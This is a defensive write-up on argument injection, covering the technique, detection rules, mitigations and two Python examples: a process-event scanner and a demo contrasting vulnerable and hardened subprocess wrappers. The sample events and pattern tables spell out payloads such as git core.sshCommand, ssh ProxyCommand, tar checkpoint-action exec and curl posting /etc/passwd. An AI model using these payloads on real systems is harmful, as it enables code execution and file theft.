Full Report
Command injection is a well-known bug where user input is concatenated into a shell command. Because of the string concatenation, an attacker can inject shell metacharacters such as a backtick or `;` to execute a different command entirely. Over the years, shell metacharacters have increasingly been filtered out. So, can we still do anything useful? It depends! Argument injection uses the same input vector, but the goal is to add arguments to the existing command rather than to start a new one. Some CLI commands are extremely powerful: on Chrome, for instance, `--gpu-launcher` is an argument that can be used to execute arbitrary commands. This link is a set of known commands with easy-to-pwn argument injection payloads. It is sort of like GTFOBins.
Analysis Summary
# Tool/Technique: Argument Injection
## Overview
Argument injection is a vulnerability that occurs when an application passes user-controlled input as arguments to a command-line interface (CLI) tool without proper validation or escaping. Unlike classic command injection, which uses shell metacharacters (e.g., `;`, `|`, `` ` ``) to execute new commands, argument injection utilizes the legitimate flags and options of the target binary to achieve malicious goals such as arbitrary code execution, file disclosure, or data exfiltration.
## Technical Details
- **Type:** Technique
- **Platform:** Cross-platform (Linux, Windows, macOS)
- **Capabilities:** Command execution, Arbitrary File Read/Write, Library Loading, Information Disclosure.
- **First Seen:** Long known, but catalogued as a distinct vulnerability class through projects such as SonarSource's "Argument Injection Vectors".
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- **T1190 - Exploit Public-Facing Application**
- **TA0002 - Execution**
- **T1203 - Exploitation for Client Execution**
- **T1059.004 - Command and Scripting Interpreter: Unix Shell**
- **TA0005 - Defense Evasion**
- **T1202 - Indirect Command Execution**
- **T1211 - Exploitation for Defense Evasion**
## Functionality
### Core Capabilities
* **Arbitrary Command Execution:** Invoking sub-processes or "launchers" via built-in arguments (e.g., Chrome's `--gpu-launcher`).
* **File Manipulation:** Using flags to read and exfiltrate files (e.g., `curl`'s `-d @/path` or `--upload-file`) or to write attacker-controlled content to the filesystem (e.g., `-o`/`--output` style options, or `tar` and `zip` archiving features).
* **Configuration Overriding:** Replacing intended application settings with attacker-controlled ones via command-line flags (e.g., SSH's `-F` pointing at an attacker-supplied config file whose `ProxyCommand` directive runs a shell command).
### Advanced Features
* **Library Loading:** Some binaries allow loading shared objects or DLLs via arguments, facilitating shellcode execution within the context of a trusted process.
* **Remote Protocol Hijacking:** Using tools like `git` or `ssh` to force connections to attacker-controlled servers via proxy or command options.
* **Bypassing Filtration:** Because the technique does not require shell metacharacters, it often bypasses Web Application Firewalls (WAFs) and input sanitizers that only look for characters like `&` or `;`.
## Indicators of Compromise
* **File Hashes:** N/A (Technique-based)
* **File Names:** N/A
* **Registry Keys:** N/A
* **Network Indicators:** Outbound connections from unexpected binaries (e.g., `git` or `psql` connecting to an unknown external IP `hXXp[:]//evil-server[.]com`).
* **Behavioral Indicators:**
* Web server processes (`www-data`, `apache`, `nginx`) spawning sub-processes with unusual or excessive flags.
* Command lines containing double dashes `--` followed by execution-related keywords like `proxy-command`, `launcher`, or `output`.
* The presence of `--` (double dash), which terminates option parsing, in an unexpected position, or option-looking tokens appearing where only positional values (paths, hostnames, URLs) should be.
## Associated Threat Actors
* This technique is commonly utilized by bug bounty hunters and penetration testers.
* No specific threat actor is attributed here. Any attacker who can reach a web application or a CI/CD pipeline that shells out to tools such as `git` can use the technique to gain an initial foothold.
## Detection Methods
* **Behavioral Detection:** Monitor process creation events (EDR/Sysmon) for binaries like `tar`, `git`, `ssh`, and `curl` where the command line contains suspicious patterns or unexpected destination paths.
* **Log Analysis:** Audit web application logs for inputs starting with `-` or strings containing `--`.
* **SIEM Rules:** Flag instances where common CLI tools are executed with flags that lead to command execution (e.g., `git -c core.sshCommand=...`).
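The following is an added example, not part of the original page, showing the behavioral and SIEM rules above as runnable detection logic. It scans constructed Sysmon/auditd-style process-creation records (the `EVENTS` list is made up for the example) against a starter table of options that make the named tool spawn a process or touch a file; the table is an assumption about what your estate cares about and should be extended.

```python
"""Flag process-creation events whose argv carries exec- or file-capable options.

Added example (not from the original page). Events are constructed records;
the option tables are a starter list, not an exhaustive catalogue.
"""
import os
import re
import shlex

# Options that make the tool execute a process. Keyed by binary basename.
# Matched against argv entries after short options are joined with their
# value, so "-c core.sshCommand=x" and "-ccore.sshCommand=x" look identical.
EXEC_OPTIONS = {
    "git": [r"^-ccore\.sshCommand=", r"^-ccore\.pager="],
    "ssh": [r"^-oProxyCommand="],
    "tar": [r"^--checkpoint-action=exec=", r"^--to-command=",
            r"^--use-compress-program="],
    "chrome": [r"^--gpu-launcher=", r"^--renderer-cmd-prefix="],
}
# Options that read or write an attacker-chosen file.
FILE_OPTIONS = {
    "curl": [r"^-o", r"^--output=", r"^-d@", r"^--data=@",
             r"^-T", r"^--upload-file="],
}
# Short/long options whose value is the *next* argv entry.
VALUE_OPTS = {"-c", "-o", "-d", "-T", "-F",
              "--data", "--output", "--upload-file", "--to-command"}
# Accounts under which a web server typically spawns children.
WEB_USERS = {"www-data", "apache", "nginx", "http"}

# Constructed sample events (ids 1, 2, 3, 5 and 7 are malicious).
EVENTS = [
    {"id": 1, "user": "www-data",
     "cmdline": "git -c core.sshCommand='bash -c id' ls-remote git@host:repo"},
    {"id": 2, "user": "www-data", "cmdline": "ssh -oProxyCommand=id example.com"},
    {"id": 3, "user": "www-data",
     "cmdline": "tar xf upload.tar --checkpoint=1 --checkpoint-action=exec=sh payload.sh"},
    {"id": 4, "user": "www-data", "cmdline": "git clone https://example.com/repo.git"},
    {"id": 5, "user": "www-data", "cmdline": "curl -s https://example.com/api -d @/etc/passwd"},
    {"id": 6, "user": "root", "cmdline": "tar czf backup.tgz /var/www"},
    {"id": 7, "user": "alice",
     "cmdline": "/opt/google/chrome/chrome --headless --gpu-launcher=/tmp/x.sh https://a.example"},
]


def normalize(argv):
    """Join value-taking options with their following argument."""
    out, i = [], 0
    while i < len(argv):
        tok = argv[i]
        if tok in VALUE_OPTS and i + 1 < len(argv):
            sep = "=" if tok.startswith("--") else ""
            out.append(tok + sep + argv[i + 1])
            i += 2
        else:
            out.append(tok)
            i += 1
    return out


def analyze_event(event):
    """Return a finding dict for a suspicious event, else None."""
    argv = shlex.split(event["cmdline"])
    if not argv:
        return None
    tool = os.path.basename(argv[0])
    reasons = []
    for arg in normalize(argv[1:]):
        if any(re.match(p, arg) for p in EXEC_OPTIONS.get(tool, [])):
            reasons.append(f"exec via {arg}")
        if any(re.match(p, arg) for p in FILE_OPTIONS.get(tool, [])):
            reasons.append(f"file access via {arg}")
    if not reasons:
        return None
    # A web server account spawning such a child is the strongest signal.
    severity = "high" if event.get("user") in WEB_USERS else "medium"
    return {"id": event["id"], "tool": tool, "severity": severity, "reasons": reasons}


def analyze(events):
    """Run analyze_event over a batch and keep only the findings."""
    return [f for f in map(analyze_event, events) if f]


if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

Option matching is keyed by the binary's basename so that `-o` means different things for `curl` and `ssh`; when deploying this as a SIEM rule, feed it the parent process and user as well, since the severity escalation on web-server accounts is what separates a developer running `git -c core.sshCommand` from a compromised web application doing so.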
## Mitigation Strategies
* **Use Argument Separators:** Put the `--` (double-dash) separator before any user-controlled positional argument so the tool stops option parsing there. Caveat: not every tool honours `--`, and some tools interpret positional values themselves (a URL or path selecting a transport or handler), so pair it with validation.
* **Input Validation:** Implement strict allow-lists for user input. Reject any value that begins with a hyphen `-`; where the value should be a file name or hostname, match it against a strict allow-list pattern rather than filtering a deny-list of characters.
* **Avoid Shell Execution:** Use argv-list APIs (e.g., Python's `subprocess.run` with a list of arguments rather than `shell=True`) so shell metacharacters cannot start a second command. This alone does not stop argument injection: the user-controlled value still reaches the binary as its own argv entry and is parsed as an option if it starts with `-`. Combine argv lists with `--` and validation.
* **Least Privilege:** Run applications with the minimum necessary permissions to limit the impact of a successful injection.
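The following is an added example, not from the original page, that demonstrates the point made in the Overview and in the mitigation list above: an argv-list API with no shell still falls to argument injection, and `--` plus an allow-list closes it. It uses the Python interpreter itself as the target CLI tool because it is guaranteed to be present on any host that runs the example; like many tools it accepts a short option with an attached value, so the single argv entry `-cprint('...')` (a constructed payload) is enough to run attacker code. The "plugin script" scenario and the helper names are assumptions made for the example.

```python
"""Argument injection without a shell: vulnerable wrapper beside hardened one.

Added example (not from the original page). The target tool is sys.executable,
which parses a short option with an attached value from a single argv entry.
"""
import os
import subprocess
import sys
import tempfile

# Constructed payload: one argv entry, no shell metacharacters at all.
PAYLOAD = "-cprint('injected code ran')"


def run_script_vulnerable(script_path: str) -> subprocess.CompletedProcess:
    """Runs a user-chosen script. No shell=True, yet injectable: the value
    lands as argv[1] and is parsed as an interpreter option."""
    return subprocess.run([sys.executable, script_path],
                          capture_output=True, text=True)


def run_script_hardened(script_path: str) -> subprocess.CompletedProcess:
    """Same call, but '--' ends option parsing, so the value can only be a path."""
    return subprocess.run([sys.executable, "--", script_path],
                          capture_output=True, text=True)


def is_safe_script_name(name: str) -> bool:
    """Allow-list check for a bare file name: non-empty, no leading '-',
    no directory components, only [A-Za-z0-9_.] characters."""
    return (name != ""
            and not name.startswith("-")
            and name == os.path.basename(name)
            and all(ch.isalnum() or ch in "_." for ch in name))


def demo() -> dict:
    """Runs both wrappers against the payload and against a real script."""
    results = {}
    results["vulnerable_stdout"] = run_script_vulnerable(PAYLOAD).stdout
    hardened = run_script_hardened(PAYLOAD)
    results["hardened_returncode"] = hardened.returncode   # non-zero: no such file
    results["hardened_stdout"] = hardened.stdout
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "plugin.py")
        with open(script, "w") as fh:
            fh.write("print('hello from plugin')\n")
        results["legit_stdout"] = run_script_hardened(script).stdout
    results["payload_passes_allowlist"] = is_safe_script_name(PAYLOAD)
    results["plugin_passes_allowlist"] = is_safe_script_name("plugin.py")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Run it and the vulnerable wrapper prints `injected code ran`, while the hardened wrapper tries to open a file literally named `-cprint('injected code ran')` and fails. The allow-list is the second layer: `--` stops the interpreter from seeing an option, but only validation stops a caller from naming a path outside the intended plugin directory.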
## Related Tools/Techniques
* **GTFOBins:** A curated list of Unix binaries that can be used to bypass local security restrictions.
* **Living off the Land Binaries (LoLBins):** Legitimate binaries used for malicious purposes.
* **Command Injection:** The broader category of vulnerabilities involving malicious command execution.